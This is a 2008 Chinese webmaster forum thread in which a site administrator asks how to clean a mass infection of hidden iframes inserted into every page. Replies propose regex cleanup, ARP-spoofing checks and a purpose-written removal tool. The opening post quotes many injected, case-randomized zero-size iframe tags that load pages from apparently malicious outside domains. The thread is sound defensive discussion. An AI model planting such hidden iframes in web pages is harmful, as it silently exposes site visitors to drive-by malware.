落伍者站长论坛 » 服务器技术及安全 » 最变态的网页挂马方式，大家来看怎么处理

spidergood 发表于 2008-1-27 18:20

最变态的网页挂马方式，大家来看怎么处理

网站被批量挂马是经常遇到的事情，不过今天碰到一个客户的网站就十分头痛，挂马方式还是第一次见到，十分变态，基本上怎么网站都费了，不知道家有没有好的办法清楚，网站的每一个页面，asp，php，html的这些页面都被加了一长串代码。而且每串代码后面的字符串都不一样，
比如 框架的名字 name=""后面的数字  代码的大小写字母，还有网页链接后面的参数，批量挂马的网页木马我见了不少，不过想这样，这么绝的挂马方式还第一次遇到，任何一个病毒代码都是唯一的，你用字符替换工具替换只能替换一个，其他的都不一样，网站有几个万个页面，，每个页面都不一样，而且每条病毒代码都一样，真正的太狠，大家又没有什么好办法处理这个问题。

<iframe src=http://pr.749571.com/ww/new05.htm?013 width=1 height=1></iframe>
<Iframe src=http://aaa.77xxmm.cn/new858.htm?075 wiDth=0 name='8411' hEight=0></iframE><iframE src=hTTp://aaa.1l1l1l.com/error/404.hTml widTh=0 name='8411' HeigHt=0></iframe>




<iframE srC=http://aaa.77xxmm.Cn/new858.htm?075 Width=0 naMe='6642' height=0></ifRame><ifRame src=http://aaa.1l1l1l.cOm/errOr/404.html wiDth=0 namE='6642' height=0></iframe>




<ifraMe src=http://aaa.77xxMM.cn/new858.htM?075 width=0 nAme='4039' height=0></ifRame><ifRame src=http://aaa.1L1L1L.com/error/404.htmL Width=0 Name='4039' height=0></iframe>




<ifraMe src=http://aaa.77xxmm.cn/new858.htm?075 width=0 nAme='5302' height=0></ifrAme><ifrAme src=http://aaa.1L1L1L.com/error/404.htmL Width=0 Name='5302' height=0></iframe>




<iframe src=http://ppp.749571.com/ww/new05.htm?013 width=1 height=1></iframe>
<ifraMe src=Http://aaa.77xxmm.cn/new858.Htm?075 wiDth=0 name='3949' height=0></ifrAme><ifrAme sRc=http://aaa.1l1l1l.com/eRRoR/404.html wIdth=0 nAme='3949' height=0></iframe>




<ifRame src=http://aaa.77xxMM.cn/new858.htM?075 wIdth=0 namE='4066' height=0></iframe><iframe src=http://aaa.1l1l1l.com/error/404.html width=0 name='4066' heIght=0></Iframe>




<iFrame src=http://aaa.77xxmm.cn/new858.htm?075 width=0 Name='1707' heIght=0></Iframe><Iframe src=http://aaa.1l1l1l.com/error/404.html width=0 name='1707' HeigHt=0></iframe>




<iframE src=http://ppp.749571.com/ww/new888.htm?011 width=1 nAme='7481' hEight=1></iframE>



<Iframe src=http://ppp.749571.com/ww/new888.htm?011 wiDth=1 name='9446' height=1></iframe>



<iframE src=http://AAA.77xxmm.cn/new858.htm?075 widtH=0 name='3144' heIght=0></Iframe><Iframe src=http://aaa.1l1l1l.coM/error/404.htMl wiDth=0 namE='3144' height=0></iframe>




<iframE src=http://AAA.77xxmm.cn/new858.htm?075 widtH=0 name='7919' heIght=0></Iframe><Iframe src=http://aaa.1l1l1l.coM/error/404.htMl wiDth=0 namE='7919' height=0></iframe>

sem 发表于 2008-1-27 18:56

晕死...............................   那先把木马地址替换了再想办法吧

Crison 发表于 2008-2-1 15:36

国家为什么不立法，放木马，去蹲10年

kangzy 发表于 2008-2-1 16:55

前些天还有个北京的QQ加我想在我站上挂马 我也是被种过马的呀 特痛恨 直接喊他滚的远远的，谁只那个女人还 上劲了 硬是要和我谈。。。。 最后还是滚蛋了   挂马的太无耻了

soxy 发表于 2008-2-1 17:05

你确定是挂了马还是 arp 攻击引起的伪装转向呢?

看看原文件里是否有这段代码先

spidergood 发表于 2008-2-1 21:48

我觉得国家也应该立法，严惩搞挂马，ddos，搞病毒的这些人，经常有人来买空间说做挂马用的，都不接的

宙斯2008 发表于 2008-2-2 12:24

牛人,要把你给忙坏了~

huanshen0634 发表于 2008-2-7 17:12

可以用一些带正则表达式的替换文本编辑工具
例如：editplus，ultraedit，或者dreamweaver都有这个功能的

abcd000000 发表于 2008-2-8 01:18

[quote]原帖由 [i]spidergood[/i] 于 2008-2-1 21:48 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=23776546&ptid=2370947][img]http://www.im286.com/images/common/back.gif[/img][/url]
我觉得国家也应该立法，严惩搞挂马，ddos，搞病毒的这些人，经常有人来买空间说做挂马用的，都不接的 [/quote]

惩罚是割JJ:lol:

webfly 发表于 2008-2-12 13:18

我写个小工具去~~~

webfly 发表于 2008-2-12 23:34

工具写出来了
ifraMe大小写变形网马清理器(落伍者专用版)
[url]http://www.im286.com/redirect.php?tid=2393702&goto=lastpost#lastpost[/url]

DieRock 发表于 2008-2-14 14:33

统配符

wuwei517200 发表于 2008-2-16 22:27

我昨天晚上也用php正则搞定，楼主找找看有没vote.PHP跟mysql.PHP后门！

Sugar__________ 发表于 2008-2-17 15:04

把<iframE 替换成<iframX 就可以了！！错误的HTML :tu:

终极坏小子 发表于 2008-2-17 16:16

niu ren

spidergood 发表于 2008-2-17 17:11

[quote]原帖由 [i]webfly[/i] 于 2008-2-12 23:34 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=23916822&ptid=2370947][img]http://www.im286.com/images/common/back.gif[/img][/url]
工具写出来了
ifraMe大小写变形网马清理器(落伍者专用版)
[url]http://www.im286.com/redirect.php?tid=2393702&goto=lastpost#lastpost[/url] [/quote]


非常不错一款软件，真是高人，不错有几个小问题，第一就是默认不支持 php文件查找，第二希望后继版本能增加自动查杀功能，我觉得作为服务器管理是非常需要这样一款软件的，如果软件再作的傻瓜化一点，就更好了

webfly 发表于 2008-2-17 18:23

本来没想继续开发新版本的，不过spidergood提出的意见真的不错，我有时间会增加自动查杀功能~~

单翼 发表于 2008-2-17 23:54

用正则写个工具

anyliz 发表于 2008-2-18 15:42

[quote]原帖由 [i]webfly[/i] 于 2008-2-12 23:34 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=23916822&ptid=2370947][img]http://www.im286.com/images/common/back.gif[/img][/url]
工具写出来了
ifraMe大小写变形网马清理器(落伍者专用版)
[url=http://www.im286.com/redirect.php?tid=2393702&goto=lastpost#lastpost]http://www.im286.com/redirect.php?tid=2393702&goto=lastpost#lastpost[/url] [/quote]
很好:)

spidergood 发表于 2008-2-19 22:22

[quote]原帖由 [i]webfly[/i] 于 2008-2-12 23:34 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=23916822&ptid=2370947][img]http://www.im286.com/images/common/back.gif[/img][/url]
工具写出来了
ifraMe大小写变形网马清理器(落伍者专用版)
[url]http://www.im286.com/redirect.php?tid=2393702&goto=lastpost#lastpost[/url] [/quote]


太佩服了，目前这个工具可以说是目前最好的清除木马的工具了，把查找文件类型改成  *.*  这样就可以查找并清除所有受感染的类型。用这个软件处理不少受变态挂马的网站。

查看完整版本: 最变态的网页挂马方式，大家来看怎么处理